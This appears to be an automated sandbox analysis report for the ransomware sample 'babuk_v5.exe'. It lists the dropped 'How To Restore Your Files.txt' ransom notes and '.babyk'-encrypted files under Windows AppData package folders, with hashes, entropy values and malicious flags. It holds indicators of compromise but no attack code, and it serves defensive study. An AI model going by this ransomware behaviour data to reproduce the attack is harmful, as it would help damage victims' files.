                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.549764595269047
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlWUOXGdpMxub1yQomo0UWaWunGWgerWilsDxKUdce4CRxfc9UxNvEEn:mF4T/7o0ZBesDsUeMl00vtn
                                                                            MD5:A446107F61FE5C6CA13BE62BFAE7A815
                                                                            SHA1:70E00C9A4E69DAEBA57F9C180CA9DF7D03E70F07
                                                                            SHA-256:7AFAC2DC3CDBC35E74EB5C32E82872C0D6C14BF4E097BA001E1DF8BEEB4B0F2A
                                                                            SHA-512:D91BDFB1A578B32DB20C9AAB02CDA519FDC21C185091A7DBE4C89C0E255DC7C4D8F0D23E9BC0A34C22D0DC3A9665FB018786F11AD76473FEF5813BEE561F9CE0
                                                                            Malicious:false
                                                                            Preview: .....,_.........s?L. d..........M.Wcb.sk...W...!a.2.v..B...V.gt.Y...CD.:..'w@.....3.....j....o.....t(C...S.qo.`^...O..m..9.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980360822240953
                                                                            Encrypted:false
                                                                            SSDEEP:192:50zpg7z4ClPQeyZ00GodOX6fX9Ap0p9KMKXZQIGzvh6:WzpgH4ClbWGodl9KLXZCvh6
                                                                            MD5:81376D0E27CD72E2057E3C9CD9BD5914
                                                                            SHA1:8BA89FBBCCB848AD38D052D1DF2D73519158C56F
                                                                            SHA-256:BBD16A7A841D1C7E6EC058F525A57AA920EE52ED3B79704A669FF2E7CA3AE34A
                                                                            SHA-512:98A9FB14D79F501F5C9E5C3575D5BBCFEC6B6E03E0784C12F702DB93C15EB3EC0CD89BE69A87AA78E316E19FD10F5483B02AACA6338D6BB21EA983D4922D461F
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.9972496904885
                                                                            Encrypted:true
                                                                            SSDEEP:1536:p/yySE9Lp9Uq/6NogKfkjjAG3sZCzT3x2DsSBK2BPxi:p/OEBU2iogCkjsGB/kXJi
                                                                            MD5:84439B62FD3692F43DA6C8A7FCBABF7D
                                                                            SHA1:B2F6DF61A0AB312E50173789BF3D6BF4974C7BFF
                                                                            SHA-256:7C84FB4B737DEDD5CCDCE5FB40F4A76D7B3B37F269AE9B7CD21C1EB7162BB119
                                                                            SHA-512:AA655D9AF317902E3A7CCF4FFB4634CC4D275061D34B43F86CAA0948629FC501940EB3A6270AF49A4974AD0B59812C78694A4B8E2CDBCE91CA38B6C378E900E6
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997146875293308
                                                                            Encrypted:true
                                                                            SSDEEP:1536:s7ajC/Ztn53FdKwMx3MJysqy5wmXoplG7/9ofY:sGE353Fd3MSr3Xuli9r
                                                                            MD5:F85251853E632B129286754F7F8D041A
                                                                            SHA1:E1EDCABBE78B405D4484B81ED29F76E54F080DD0
                                                                            SHA-256:3203A09762DD40F3DF3C7DAE1646D21007D7328BAA9CFC776D8F8BBC8C42BF1B
                                                                            SHA-512:7CE713651E02F8EB1EABBC5655152E88B299AC666C5C18ACD2B16E4CF753E98E208BC7099A692A6936A9D5C91C6339FB2D05BDCC3D70942F943A186B69B135D7
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997298731277479
                                                                            Encrypted:true
                                                                            SSDEEP:1536:NqR58bimLL48CAx5qpLX3tzDCC0yLm1yklIPT+zP7MuiDnHsAz:0uGC4Ax52D9zDCyLYi+zP7viDnMM
                                                                            MD5:9CE55893652548819B3681EE1ACFFAA3
                                                                            SHA1:0C730D49944DB2835C2DE6FC7285899C6EAAC213
                                                                            SHA-256:65F4C4BBF1F51505C44E9BD89FADEB692EB3BF75BF8E3616855C46F53302EA6A
                                                                            SHA-512:DA1C5DEBA927D857EB5A20CA944B0230C69AC1F9CD78380ED4FFC3B925AB74B7D5ED23114FEEB7D5B992DD06B4C81CEF8C9F6D2D8B038F79EF044CD3D5FE76C7
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):131240
                                                                            Entropy (8bit):7.998666537801151
                                                                            Encrypted:true
                                                                            SSDEEP:3072:YIP6RQktTHSmwiFQt5VqnpMFNf0jas+jcuC7bGHel3yFQF:Y5BHSmwiAwp+f0j8cvielCFW
                                                                            MD5:7749B5E42EC0943280CCB966373EE4F8
                                                                            SHA1:CBF4D764EB540223B02E0838B0C6C80D6FCF885B
                                                                            SHA-256:F60553673B7736430132508BA3B0E4F12536E27212DCB13687C86ACBE8FB7A14
                                                                            SHA-512:E0480C6C44A3EE9F2E9F1C881962CE071816FE020C37E2995C683463BA0D927FA6D321CA8EDAA8305417EAC8D3721CB3B8260AABAC3B66B84A1E31571636FBE8
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):65704
                                                                            Entropy (8bit):7.997147191641788
                                                                            Encrypted:true
                                                                            SSDEEP:1536:D3UauCXaMKHsWxmbg9byKreFw18EX/9PGTbIkFUd:z0CX0MWxmpyeFGLX/9PXcUd
                                                                            MD5:E7096584B5356588EFEF6FF14BD1D970
                                                                            SHA1:BC3A10857FF837E46AB38A5968B90C3B9D826D9B
                                                                            SHA-256:E83ECB7D2E873D07F0BF205E156B7AA1E3F6E8CC86E42D53B7CB691C7C5C31AB
                                                                            SHA-512:D38289800D77E5A51791B8EDDC282E718784088273F82A8683BD9D859F0EDCB802DA29FF0562E32704855D7BAAE60B8276E1C7B6D171290DA5EBDD371E67BE79
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):131240
                                                                            Entropy (8bit):7.9984730596104505
                                                                            Encrypted:true
                                                                            SSDEEP:3072:XaOoG8BKrFK7sM17SCmv0DmF8eIeM7D3CGoPffxE/:YG8EK4M17S4mFnM7DyGKW/
                                                                            MD5:5B3E6DDBA447D6EB102CB5134AAB47CD
                                                                            SHA1:13C0829A33C2F56F7B774DA26953BF9336401DAD
                                                                            SHA-256:D14272FE5C8E06015CF180E29B6BEA33E4FF61626D30FAA479B98FB8D60DB9A0
                                                                            SHA-512:38AC45A6A8183BE9F4511404502F7C590498911C6BB817536CD06E64A874FF6AE17E8DFB050754F2EBD1A97338A5725FFD944119267649560FF295A3E8CB8AAA
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.565568297840792
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl+cmH8XLQkF2HvqjTWY1h5a+jyPrFs9JaGolXaLUxNvEEn:5XEYTWY1z1yFz+L0vtn
                                                                            MD5:272149C9C40F379C4FFC4F19326E04DC
                                                                            SHA1:563E9C06DC8ACCD651868417CD7135EA5C2791A8
                                                                            SHA-256:112297062D8524DF4B6535451A9618DEE07176E81A9F23E8AEF18C0C5C31D8F4
                                                                            SHA-512:5A2161FA4FA980C69B9C0907365DEC376ED31D6848900ECF8E87A84EB416A77D47E0E52AC67C9A59891FB6BBD43D361D6F92A9B9F89722868889D07C685E5D70
                                                                            Malicious:false
                                                                            Preview: .....i.#.".tik..;(J....P..M.3........]t.e.q..J\....F....|F..Z_......F..c...6Y...u....D..k.8.U........[.5C..cG....@.;.v...A..6@....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.979973233234569
                                                                            Encrypted:false
                                                                            SSDEEP:192:cEpQmZ25zPYwSFbRGePPC2d07+0hXi1ztlQkZ/Ry1dGd:0PShRPPda7gtuqRy2d
                                                                            MD5:24E346287393E1555338CA06AD3B621B
                                                                            SHA1:6D51E4DB1D0C1B6ECCEE1B5FD83220B1F105EDF3
                                                                            SHA-256:25C93E52C1590EF3FC85745664474BDAB46DBA26880B5BAEDA85D1C3A3F3C549
                                                                            SHA-512:08AC973CECFECD5BACB321B0BDA4B8B07D0C55C13BFEE6E4EF572A515C60F4FCAA6B9D00F78C943770C2F9319DD2FA30D474DDD5FEFBFDF354211AA3C061169B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
